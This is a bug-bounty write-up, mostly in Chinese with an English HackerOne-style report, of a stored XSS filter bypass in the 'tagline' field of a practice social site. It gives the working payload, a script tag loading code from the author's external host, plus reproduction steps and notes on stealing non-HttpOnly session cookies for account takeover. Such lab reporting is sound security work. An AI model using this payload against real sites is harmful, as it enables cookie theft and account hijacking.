bugbountyhunter scope BARKER:第五滴血 儲存型 XSS Filter 繞過 報告

sec875發表於2024-08-02

經過簡單的payload除錯,發現存在 Filter
image

檢查:https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet

image

發現payload: <script%20src=//sec875.com/1.html%0A--%3E 有效
image

訪問 https://5cc259cfb319-sec875.a.barker-social.com/group/11 觸發xss payload
image

image

hackerone 將以上步驟視為有效報告

後利用:可部署VPS或在本地DNS指向127.0.0.1已證明XSS可以被執行(需要部署SSL http)

例外:進行多次觀察,tagline標籤中的值反映到了在多個頁面,那些地方是否還存在 Filter?

Report title:Storage Cross-Site Scripting XSS
Endpoint:https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Vulnerable Parameter:tagline
Payload:POST tagline parameter <script%20src=//sec875.com/1.html%0A--%3E

正文
l have discovered a Storage XSS vulnerability affecting the endpoint 'group/11/edit' in the parameter 'tagline'. The payloed requires have a filter bypass and is a simple, <script%20src=//sec875.com/1.html%0A--%3E

You can see a working proof of concept here:
https://5cc259cfb319-sec875.a.barker-social.com/group/11/
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)

To reproduce:
1.After logging in, create a group and go to the following location

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)

2.After simple debugging, I found that there is a Filter. I checked: https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet and found that the payload: <script%20src=//sec875.com/1.html%0A--%3E is valid

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/jsv9dlgesgv0fkgzy21c.png)

3.Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the xss payload

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/ml2lep1mclz0m3itvbbi.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)

4.Post-exploitation: You can deploy VPS or point the local DNS to 127.0.0.1. It has been proven that XSS can be executed (SSL http needs to be deployed). You will observe xss executes

Payload used: <script%20src=//sec875.com/1.html%0A--%3E. have a filtering at parameter 'tagline'.
Vulnerable parameter: tagline
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit

lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.

相關文章